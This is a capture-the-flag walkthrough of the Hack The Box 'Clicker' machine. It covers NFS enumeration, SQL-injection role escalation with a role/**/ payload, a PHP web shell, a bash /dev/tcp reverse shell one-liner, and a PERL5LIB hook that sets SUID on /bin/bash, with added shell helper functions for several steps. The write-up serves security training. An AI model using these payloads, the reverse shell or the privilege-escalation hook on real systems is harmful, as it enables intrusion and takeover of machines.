In this post, I would like to share a walkthrough of the Clicker machine from Hack The Box.
This box is rated Medium on Hack The Box.
What will you gain from the Clicker machine?
For the user flag, you start with a website hosting a game reminiscent of Universal Paperclips. Through careful source review, I'll uncover a mass assignment vulnerability and use newline injection and SQL injection to bypass the role filter and elevate my account to admin. I'll then exploit an arbitrary file write to drop a web shell and gain code execution on the system. To move further, I'll identify a SetUID binary owned by the next user and abuse it to read their SSH key.
For the root flag, you need to abuse the way a script running with root privileges handles Perl environment variables.
For those who want to learn or improve their cyber security skills, especially Red Teaming and Blue Teaming, you can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me.
The Academy link can be found at https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vvv
Information Gathering on Clicker Machine
Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we can start.
┌─[darknite@parrot]─[~/Documents/htb/Clicker]
└──╼ $ nmap -sV -sC 10.10.11.232 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-25 21:32 EDT
Nmap scan report for 10.10.11.232
Host is up (0.16s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 89d7393458a0eaa1dbc13d14ec5d5a92 (ECDSA)
|_ 256 b4da8daf659cbbf071d51350edd81130 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://clicker.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39593/udp6 mountd
| 100005 1,2,3 40478/udp mountd
| 100005 1,2,3 54941/tcp mountd
| 100005 1,2,3 59945/tcp6 mountd
| 100021 1,3,4 35535/tcp nlockmgr
| 100021 1,3,4 46513/tcp6 nlockmgr
| 100021 1,3,4 50096/udp nlockmgr
| 100021 1,3,4 53836/udp6 nlockmgr
| 100024 1 44540/udp status
| 100024 1 47015/tcp6 status
| 100024 1 51776/udp6 status
| 100024 1 60587/tcp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.14 seconds
┌─[darknite@parrot]─[~/Documents/htb/Clicker]
└──╼ $
Let's take a look at the website.
There is nothing interesting on the landing page other than the option to register a new account and log in with it.
So let's register an account and log in, which brings us to the interface shown above.
The profile page looks like the screenshot above.
The play interface looks something like the one above.
Inspecting the game's requests in Burp Suite, nothing odd stands out in the responses.
Showmount enumeration on the machine
Since NFS is exposed (rpcbind on 111 and nfs on 2049 in the scan), let's run showmount against clicker.htb, which reveals a /mnt/backups export.
First, we create a local directory to use as the mount point.
Then we mount the export on our attacking machine.
Inside the mount there is a zip file that we can analyze further on our side.
Let's copy the file over to our attacking machine.
Afterwards we unmount the share so nothing stays attached to the target.
Let's extract the zip file.
It contains a lot of PHP files that are worth investigating.
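The showmount, mount, copy and unmount steps above, packaged as reusable shell functions. This is an added example and not code from the original post; the export path /mnt/backups and the host clicker.htb come from the post, while the local mount point, the loot directory and the sample showmount output are assumptions.

```sh
# Added example, not part of the original post.

# Pull the export paths out of `showmount -e` output.
# Argument is the text showmount printed; prints one export path per line.
parse_exports() {
    # Drop the "Export list for <host>:" header line, keep the first column.
    printf '%s\n' "$1" | sed '1d' | awk '{ print $1 }'
}

# Mount one export read-only, copy everything out, then unmount again so
# nothing stays attached to the target when we are done.
fetch_export() {
    host="$1"; export_path="$2"; mount_point="$3"; dest="$4"
    mkdir -p "$mount_point" "$dest"
    # ro: never write to the target's share; nolock: no local rpc.statd needed
    sudo mount -t nfs -o ro,nolock "$host:$export_path" "$mount_point" || return 1
    # NFS reports the server's numeric uid/gid, which tells us which account
    # on the target the files belong to (useful later for the user step).
    ls -ln "$mount_point"
    cp -r "$mount_point"/. "$dest"/
    sudo umount "$mount_point"
}

# Constructed sample of what showmount printed for the box (assumed layout).
SAMPLE_SHOWMOUNT='Export list for clicker.htb:
/mnt/backups *'

# Usage against the real target (performs the actual mount):
#   for p in $(parse_exports "$(showmount -e clicker.htb)"); do
#       fetch_export clicker.htb "$p" /mnt/clicker_nfs ./loot
#   done
parse_exports "$SAMPLE_SHOWMOUNT"
```

Mounting read-only and unmounting straight after copying keeps the share from hanging on your machine if the VPN drops; the ls -ln output is worth keeping, since the numeric owner of the backup often points at the user you need next.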
Analyzing the PHP source code
Reviewing the PHP source shows that we can escalate our account to the admin role in the web application.
The save request takes the game's parameters and writes each parameter name straight into an SQL UPDATE; the only protection is a check that rejects a parameter named role. Appending a parameter such as &role/**/=Admin after the level parameter slips past that check, while MySQL treats /**/ as an empty comment and updates the role column anyway. A newline in the name (%0a in the URL) works the same way.
At first it didn't seem to work, which caught me off guard, but the change took effect once I logged out and back in, since the role is loaded into the session at login.
The interface should then look like the screenshot above.
However, there is nothing immediately useful on the Administrator panel.
So let's add another parameter to the same save request whose value is a simple PHP web shell.
Then we use the export feature and set the extension to php, so the stored data is written out as a PHP file.
Finally, requesting the exported file with the id command confirms that we have command execution.
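To make the two halves of this bug concrete, here is a shell model of the vulnerable save handler: the role filter that compares parameter names, and the UPDATE builder that concatenates names unquoted while quoting values. It also shows why the web shell value from the export step is harmless as SQL but dangerous once written to a .php file. This is an added example and not the Clicker application's code; the players table, the column names and the nickname parameter are assumptions.

```sh
# Added example, not the application's real code.

# The filter: returns 0 (blocked) if any key lower-cases to exactly "role".
filter_blocks() {
    for pair in "$@"; do
        key=${pair%%=*}
        # The trailing "." stops $( ) from stripping a newline at the end of
        # the key, which would otherwise make the model stricter than PHP.
        lower=$(printf '%s.' "$key" | tr '[:upper:]' '[:lower:]')
        if [ "$lower" = "role." ]; then
            return 0
        fi
    done
    return 1
}

# Mimic PDO::quote(): wrap in single quotes, backslash-escape embedded ones.
sql_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/\\\\'/g")"
}

# Build the SET clause the way the vulnerable code does: key unquoted,
# value quoted. Prints the full UPDATE so the injection point is visible.
build_update() {
    set_clause=""
    for pair in "$@"; do
        key=${pair%%=*}
        value=${pair#*=}
        set_clause="${set_clause}${key}=$(sql_quote "$value"),"
    done
    set_clause=${set_clause%,}
    printf 'UPDATE players SET %s WHERE username=:player' "$set_clause"
}

# What the application does with one save request.
handle_save() {
    if filter_blocks "$@"; then
        printf 'request rejected by the role filter'
        return 1
    fi
    build_update "$@"
}

# Plain attempt: rejected.
handle_save "clicks=10" "level=2" "role=Admin" || true; echo
# Comment trick: the key is "role/**/", which is not "role" to the filter,
# but MySQL reads it as the column role followed by an empty comment.
handle_save "clicks=10" "level=2" "role/**/=Admin"; echo
# Newline trick (%0a in the URL): same idea with whitespace instead of a comment.
handle_save "clicks=10" "level=2" "$(printf 'role\n=Admin')"; echo
# Web shell as a value: quoted, so it is inert SQL, but it is stored verbatim
# and becomes live PHP once the admin export writes it into a .php file.
handle_save "clicks=10" "nickname=<?php system(\$_GET[\"cmd\"]); ?>"; echo
```

The fix on the application side is to whitelist the columns a player may update and bind only their values; checking the key name for a blacklisted word, as the filter does here, can always be dodged with whatever the SQL parser ignores.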
Let's start a listener on our attacking machine.
Then we run a reverse shell command through the web shell, which is the easiest way to get a shell back on our machine.
P/s: the classic bash one-liner bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 also works, but it must be URL-encoded before it is passed through the cmd parameter, since the spaces, slashes and ampersands would otherwise break the query string.
Enumeration from www-data to user access
Boom! We have a shell as www-data.
I notice only two users have bash as their login shell.
A few files owned by jack are worth investigating.
One of them contains instructions for a web application management task.
The other is a binary; even though it belongs to jack, it is still readable by us.
Let's check the file type of the binary.
Next, we download the binary to our machine.
As shown in the screenshot above, the download succeeded.
We can also analyze the binary with the strings command.
The output reveals a MySQL command, which we can run on the machine ourselves.
I didn't expect the MySQL command to work, but let's follow this path before trying something else.
There are a few databases in MySQL, but clicker stands out from the others.
A few players are stored in the database, although this may be a rabbit hole.
It looks promising when I run the command above.
At last, we retrieve an SSH private key that we can use to access the machine.
Let's try it for the other user we found earlier, jack, and the key works.
We can read the user flag with cat user.txt.
Escalating to root privileges
As usual, we run the basic enumeration commands and find an interesting file, monitor.sh.
From reading the bash script, we can abuse the PERL5LIB environment variable, as explained here.
Using the command from that page, we can inject our own code into the script's execution.
As the screenshot shows, /bin/bash does not have the SetUID bit set yet.
So let's use the injection to set the SetUID bit on /bin/bash so we can escalate to root.
As shown above, bash now has the SetUID bit set, highlighted in red.
Finally, running bash -p (the -p flag stops bash from dropping the effective UID) gives us a root shell.
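The PERL5LIB trick above as shell functions, added here as an example and not taken from the original post. PERL5LIB prepends directories to Perl's @INC, so a module with the same name as one the root-run script loads is picked up from our directory first, and its BEGIN block runs before the script body does. The module name Target::Module is a placeholder for whatever the script really uses; /opt/monitor.sh is the script named in the post; the sudo line assumes the variable is allowed to reach the privileged process.

```sh
# Added example, not from the original post.

# Write a drop-in module whose BEGIN block runs as soon as Perl compiles it.
# $1 = directory to put on PERL5LIB, $2 = module name, e.g. Target::Module
make_perl5lib_hook() {
    libdir="$1"; module="$2"
    path=$(printf '%s' "$module" | sed 's#::#/#g').pm   # Target::Module -> Target/Module.pm
    mkdir -p "$libdir/$(dirname "$path")"
    cat > "$libdir/$path" <<'EOF'
# BEGIN runs at compile time, before the real script body does anything.
BEGIN { system("chmod u+s /bin/bash"); }
1;
EOF
    printf '%s' "$libdir/$path"
}

# The command to run on the target: the variable goes on the sudo line so it
# is set inside the privileged process rather than only in our own shell.
privesc_command() {
    printf 'sudo PERL5LIB=%s %s' "$1" "$2"
}

# Verify the result: [ -u ] is true when the set-user-ID bit is present,
# the same "s" that shows up in the owner execute slot of `ls -l`.
is_suid() {
    [ -u "$1" ]
}

# Usage on the target (module name assumed; find the real one with
# grep -n '^use ' on the Perl script that monitor.sh runs):
#   make_perl5lib_hook /tmp/lib Target::Module
#   eval "$(privesc_command /tmp/lib /opt/monitor.sh)"
#   is_suid /bin/bash && bash -p
```

Two checks before trying this on a real target: the script must actually load the module you shadow (otherwise nothing fires), and the environment variable must survive into the root process, which is exactly what a script that unsets PERL5LIB and friends before calling Perl is there to prevent.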
We can read the root flag with cat root.txt.